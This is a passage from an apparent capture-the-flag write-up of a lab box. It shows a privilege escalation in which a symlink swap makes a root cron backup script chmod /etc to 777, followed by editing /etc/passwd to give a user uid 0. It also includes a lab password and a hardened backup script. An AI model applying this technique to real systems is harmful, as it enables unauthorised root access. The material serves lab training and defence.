giovanni@teacher:~/work$ mv tmp tmp.old
giovanni@teacher:~/work$ ln -s /etc tmp
giovanni@teacher:~/work$ ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Feb 17 20:24 .
drwxr-x--- 4 giovanni giovanni 4096 Nov  4  2018 ..
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
lrwxrwxrwx 1 giovanni giovanni    4 Feb 17 20:24 tmp -> /etc
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp.old

After the cron job runs, pspy shows:

2020/02/17 20:26:01 CMD: UID=0    PID=1958   | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:26:01 CMD: UID=0    PID=1959   | gzip
2020/02/17 20:26:01 CMD: UID=0    PID=1960   | /bin/bash /usr/bin/backup.sh
2020/02/17 20:26:01 CMD: UID=0    PID=1961   | tar -xf backup_courses.tar.gz
2020/02/17 20:26:01 CMD: UID=0    PID=1962   | "chmod 777 adduser.conf adjtime alternatives analog.cfg apache2 apm apparmor.d apt backup_courses.tar.gz bash.bashrc bash_completion bash_completion.d bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf ca-certificates.conf.dpkg-old calendar console-setup courses cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbconfig-common dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fail2ban fonts fstab fuse.conf gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init init.d initramfs-tools inputrc insserv.conf.d iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf lighttpd locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d monit motd mtab mysql nanorc network networks newt nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl php phpmyadmin profile profile.d protocols python python2.7 python3 python3.5 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services sgml shadow shadow- shells skel ssh ssl staff-group-for-usr-local subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim vmware-tools wgetrc X11 xdg xml -R
2020/02/17 20:26:14 CMD: UID=0    PID=1963   |

The folder /etc is now world-writable. We revert our change so the script resumes its original task:

giovanni@teacher:~/work$ rm tmp
giovanni@teacher:~/work$ mv tmp.old tmp
giovanni@teacher:~/work$ cd /etc
giovanni@teacher:/etc$ ls -l passwd
-rwxrwxrwx 1 root root 1450 Jun 27  2018 passwd

We can now change the uid and gid of user giovanni to 0 in /etc/passwd:

giovanni@teacher:~/work$ cat /etc/passwd | grep giovanni
giovanni:x:1000:1000:Giovanni,1337,,:/home/giovanni:/bin/bash
giovanni@teacher:~$ sed 's/giovanni:x:1000:1000:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/giovanni:x:0:0:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/' /etc/passwd > /tmp/passwd
giovanni@teacher:~$ cp /tmp/passwd /etc/passwd
giovanni@teacher:~$ cat /etc/passwd | grep giovanni
giovanni:x:0:0:Giovanni,1337,,:/home/giovanni:/bin/bash
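The root cause is a root cron job that trusts a directory tree owned by an unprivileged user and then runs chmod 777 on whatever tmp resolves to. The following is an added example, not the box's script: it reproduces that behaviour against a throwaway directory and puts a hardened variant beside it that writes to a destination outside the user's tree, refuses symlinks and keeps restrictive permissions. All paths are parameters supplied by the caller; the assumed layout is the one from the write-up (a courses/ input directory under the work directory).

```shell
#!/bin/sh
# Added example, not the script from the box. Both functions take their
# directories as parameters so they can be exercised on a temporary tree.

# Reproduction of /usr/bin/backup.sh from the write-up (minus -v), run in a
# subshell so the cd calls do not leak into the caller. "tmp" is resolved at
# run time inside a user-owned directory, so the user can replace it with a
# symlink and every file under the link target ends up mode 777.
vulnerable_backup() (
    cd "$1" || exit 1
    tar -czf tmp/backup_courses.tar.gz courses/*
    cd tmp || exit 1
    tar -xf backup_courses.tar.gz
    chmod -R 777 -- *
)

# Hardened variant. $1 is the user's work directory (read only), $2 is a
# destination owned by the account running the job (assumed root-owned and
# outside any user-writable tree), so a symlink swap by the user can redirect
# neither the write nor the chmod.
safe_backup() {
    work="$1"
    dest="$2"
    # Never operate through a symlink, and only on real directories.
    if [ -L "$dest" ] || [ ! -d "$dest" ]; then
        echo "refusing: $dest is not a real directory" >&2
        return 1
    fi
    if [ -L "$work/courses" ] || [ ! -d "$work/courses" ]; then
        echo "refusing: $work/courses is not a real directory" >&2
        return 1
    fi
    # tar without -h archives symlinks as links instead of following them,
    # so a link planted inside courses/ does not pull in its target.
    tar -czf "$dest/backup_courses.tar.gz" -C "$work" courses || return 1
    tar -xzf "$dest/backup_courses.tar.gz" -C "$dest" || return 1
    # Owner read/write, everyone else read-only: no world-writable files.
    chmod -R u=rwX,go=rX "$dest"
}
```

The symlink test in safe_backup is still a race if the destination were user-owned; moving the destination out of the user's tree is what actually closes the hole.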

Root flag

giovanni@teacher:~$ exit
logout
www-data@teacher:/var/www/html/moodle/question$ su - giovanni
Password: expelled

root@teacher:~# whoami
root
root@teacher:~# cat /root/root.txt
<ROOT_FLAG>

References

Daniel Simao 20:28, 16 February 2020 (EST)